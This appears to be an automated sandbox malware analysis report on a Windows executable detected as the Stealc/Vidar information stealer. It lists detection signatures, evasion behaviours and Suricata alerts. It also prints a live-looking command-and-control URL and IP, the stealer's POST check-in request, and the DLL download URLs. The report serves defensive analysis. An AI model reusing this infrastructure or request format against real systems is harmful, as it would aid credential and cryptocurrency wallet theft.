Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1530966
MD5:	7c9061299e31179207d11e7c9790ee0b
SHA1:	44bca72cd503143c705e91bf1d8a378e56ba65c1
SHA256:	d23559eacee8397368f036a9eb559fbe679827d8639f25da0a08791a2df6b3d5
Tags:	exeuser-Bitsight
Infos:

Detection

Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Found malware configuration

Suricata IDS alerts for network traffic

Yara detected Powershell download and execute

Yara detected Stealc

Yara detected Vidar stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found evasive API chain (may stop execution after checking locale)

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Machine Learning detection for sample

PE file contains section with special chars

Searches for specific processes (likely to inject)

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

file.exe (PID: 2484 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 7C9061299E31179207D11E7C9790EE0B)

cleanup

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Threatname: Vidar

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000003.1707097418.0000000005000000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.1934685574.000000000131E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.1934685574.0000000001395000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 2484	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: file.exe PID: 2484	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: file.exe PID: 2484	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 2484	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.file.exe.b80000.0.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security

Suricata Signatures

ET MALWARE Win32/Stealc Active C2 Responding with browsers Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-10T18:23:09.132778+0200	2044245	1	Malware Command and Control Activity Detected	185.215.113.37	80	192.168.2.4	49731	TCP

ET MALWARE Win32/Stealc Requesting browsers Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-10T18:23:09.126964+0200	2044244	1	Malware Command and Control Activity Detected	192.168.2.4	49731	185.215.113.37	80	TCP

ET MALWARE Win32/Stealc Requesting plugins Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-10T18:23:09.351959+0200	2044246	1	Malware Command and Control Activity Detected	192.168.2.4	49731	185.215.113.37	80	TCP

ET MALWARE Win32/Stealc Submitting System Information to C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-10T18:23:10.357868+0200	2044248	1	Malware Command and Control Activity Detected	192.168.2.4	49731	185.215.113.37	80	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-10T18:23:09.359068+0200	2044247	1	Malware Command and Control Activity Detected	185.215.113.37	80	192.168.2.4	49731	TCP

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-10T18:23:08.897672+0200	2044243	1	Malware Command and Control Activity Detected	192.168.2.4	49731	185.215.113.37	80	TCP

ETPRO MALWARE Common Downloader Header Pattern HCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-10T18:23:10.841831+0200	2803304	3	Unknown Traffic	192.168.2.4	49731	185.215.113.37	80	TCP
2024-10-10T18:23:16.265647+0200	2803304	3	Unknown Traffic	192.168.2.4	49731	185.215.113.37	80	TCP
2024-10-10T18:23:17.317143+0200	2803304	3	Unknown Traffic	192.168.2.4	49731	185.215.113.37	80	TCP
2024-10-10T18:23:18.051589+0200	2803304	3	Unknown Traffic	192.168.2.4	49731	185.215.113.37	80	TCP
2024-10-10T18:23:18.634073+0200	2803304	3	Unknown Traffic	192.168.2.4	49731	185.215.113.37	80	TCP
2024-10-10T18:23:20.637508+0200	2803304	3	Unknown Traffic	192.168.2.4	49731	185.215.113.37	80	TCP
2024-10-10T18:23:21.291886+0200	2803304	3	Unknown Traffic	192.168.2.4	49731	185.215.113.37	80	TCP

HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGDBFIIECBGDGDGDHCAKHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 44 42 46 49 49 45 43 42 47 44 47 44 47 44 48 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 41 41 33 35 44 42 46 32 45 45 34 31 38 36 36 34 38 36 36 33 36 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 42 46 49 49 45 43 42 47 44 47 44 47 44 48 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 42 46 49 49 45 43 42 47 44 47 44 47 44 48 43 41 4b 2d 2d 0d 0a Data Ascii: ------EGDBFIIECBGDGDGDHCAKContent-Disposition: form-data; name="hwid"2AA35DBF2EE41866486636------EGDBFIIECBGDGDGDHCAKContent-Disposition: form-data; name="build"doma------EGDBFIIECBGDGDGDHCAK--

Source: file.exe, 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1934685574.000000000131E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.1934685574.0000000001378000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.1934685574.0000000001395000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/freebl3.dll
Source: file.exe, 00000000.00000002.1934685574.0000000001395000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/freebl3.dllWQ-
Source: file.exe, 00000000.00000002.1934685574.0000000001395000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/mozglue.dll
Source: file.exe, 00000000.00000002.1934685574.0000000001395000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/mozglue.dll3Q
Source: file.exe, 00000000.00000002.1934685574.0000000001395000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/mozglue.dllEQ
Source: file.exe, 00000000.00000002.1934685574.0000000001395000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/mozglue.dllO
Source: file.exe, 00000000.00000002.1934685574.0000000001395000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/msvcp140.dll
Source: file.exe, 00000000.00000002.1934685574.0000000001395000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/msvcp140.dll=
Source: file.exe, 00000000.00000002.1934685574.0000000001364000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/nss3.dll
Source: file.exe, 00000000.00000002.1934685574.0000000001364000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/nss3.dllH
Source: file.exe, 00000000.00000002.1934685574.0000000001395000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/softokn3.dll
Source: file.exe, 00000000.00000002.1934685574.0000000001395000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/softokn3.dll/Qe
Source: file.exe, 00000000.00000002.1934685574.0000000001395000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/softokn3.dllA
Source: file.exe, 00000000.00000002.1934685574.0000000001395000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/sqlite3.dll
Source: file.exe, 00000000.00000002.1934685574.000000000131E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/sqlite3.dll=
Source: file.exe, 00000000.00000002.1934685574.000000000131E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/sqlite3.dllS
Source: file.exe, 00000000.00000002.1934685574.0000000001378000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/vcruntime140.dll
Source: file.exe, 00000000.00000002.1934685574.0000000001395000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.1934685574.0000000001395000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php.dll
Source: file.exe, 00000000.00000002.1934685574.0000000001395000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php.dllL
Source: file.exe, 00000000.00000002.1934685574.0000000001395000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php3
Source: file.exe, 00000000.00000002.1934685574.0000000001395000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpASCA
Source: file.exe, 00000000.00000002.1934685574.0000000001395000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpFirefox
Source: file.exe, 00000000.00000002.1934685574.0000000001395000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpNTEGEG
Source: file.exe, 00000000.00000002.1934685574.0000000001364000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1934685574.0000000001395000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpR
Source: file.exe, 00000000.00000002.1934685574.0000000001395000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpRY
Source: file.exe, 00000000.00000002.1934685574.0000000001395000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php_url
Source: file.exe, 00000000.00000002.1934685574.0000000001395000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpe_las
Source: file.exe, 00000000.00000002.1934685574.0000000001395000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpf
Source: file.exe, 00000000.00000002.1934685574.0000000001378000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpmainnet
Source: file.exe, 00000000.00000002.1934685574.0000000001395000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpser
Source: file.exe, 00000000.00000002.1934685574.0000000001378000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/l
Source: file.exe, 00000000.00000002.1934685574.000000000131E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37C
Source: file.exe, 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.37e2b1563c6670f193.phption:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: file.exe, 00000000.00000002.1958804082.000000006F8ED000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: file.exe, 00000000.00000002.1950194902.000000001D746000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1958393654.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: file.exe, 00000000.00000003.1802719683.00000000013E6000.00000004.00000020.00020000.00000000.sdmp, ECAKECAE.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000002.1955337220.00000000296E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1934685574.0000000001395000.00000004.00000020.00020000.00000000.sdmp, DGCFHIDAKECFHIEBFCGI.0.dr	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: file.exe, 00000000.00000002.1955337220.00000000296E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1934685574.0000000001395000.00000004.00000020.00020000.00000000.sdmp, DGCFHIDAKECFHIEBFCGI.0.dr	String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: file.exe, 00000000.00000003.1802719683.00000000013E6000.00000004.00000020.00020000.00000000.sdmp, ECAKECAE.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.1802719683.00000000013E6000.00000004.00000020.00020000.00000000.sdmp, ECAKECAE.0.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.1802719683.00000000013E6000.00000004.00000020.00020000.00000000.sdmp, ECAKECAE.0.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000002.1955337220.00000000296E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1934685574.0000000001395000.00000004.00000020.00020000.00000000.sdmp, DGCFHIDAKECFHIEBFCGI.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: file.exe, 00000000.00000002.1955337220.00000000296E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1934685574.0000000001395000.00000004.00000020.00020000.00000000.sdmp, DGCFHIDAKECFHIEBFCGI.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: file.exe, 00000000.00000003.1802719683.00000000013E6000.00000004.00000020.00020000.00000000.sdmp, ECAKECAE.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.1802719683.00000000013E6000.00000004.00000020.00020000.00000000.sdmp, ECAKECAE.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.1802719683.00000000013E6000.00000004.00000020.00020000.00000000.sdmp, ECAKECAE.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: DGCFHIDAKECFHIEBFCGI.0.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://mozilla.org0/
Source: EGHJKJKKJDHIDHJKJDBGCGCBAE.0.dr	String found in binary or memory: https://support.mozilla.org
Source: EGHJKJKKJDHIDHJKJDBGCGCBAE.0.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: EGHJKJKKJDHIDHJKJDBGCGCBAE.0.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: file.exe, file.exe, 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1794800127.000000001D64C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: file.exe, 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK201621kbG1nY
Source: file.exe, 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Ed1aWxkV
Source: file.exe, 00000000.00000003.1794800127.000000001D64C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: file.exe, 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17WdsYWhtbmRlZHwxfDB8MHxab2hvIF
Source: file.exe, 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17mluIFdhbGxldHxmbmpobWtoaG1rYm
Source: file.exe, 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17t
Source: file.exe, 00000000.00000002.1955337220.00000000296E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1934685574.0000000001395000.00000004.00000020.00020000.00000000.sdmp, DGCFHIDAKECFHIEBFCGI.0.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: file.exe, 00000000.00000003.1802719683.00000000013E6000.00000004.00000020.00020000.00000000.sdmp, ECAKECAE.0.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000002.1955337220.00000000296E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1934685574.0000000001395000.00000004.00000020.00020000.00000000.sdmp, DGCFHIDAKECFHIEBFCGI.0.dr	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: file.exe, 00000000.00000003.1802719683.00000000013E6000.00000004.00000020.00020000.00000000.sdmp, ECAKECAE.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: EGHJKJKKJDHIDHJKJDBGCGCBAE.0.dr	String found in binary or memory: https://www.mozilla.org
Source: file.exe, 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: EGHJKJKKJDHIDHJKJDBGCGCBAE.0.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: file.exe, 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: EGHJKJKKJDHIDHJKJDBGCGCBAE.0.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: file.exe, 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: file.exe, 00000000.00000003.1885741313.0000000029A6C000.00000004.00000020.00020000.00000000.sdmp, EGHJKJKKJDHIDHJKJDBGCGCBAE.0.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: file.exe, 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/ZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBM
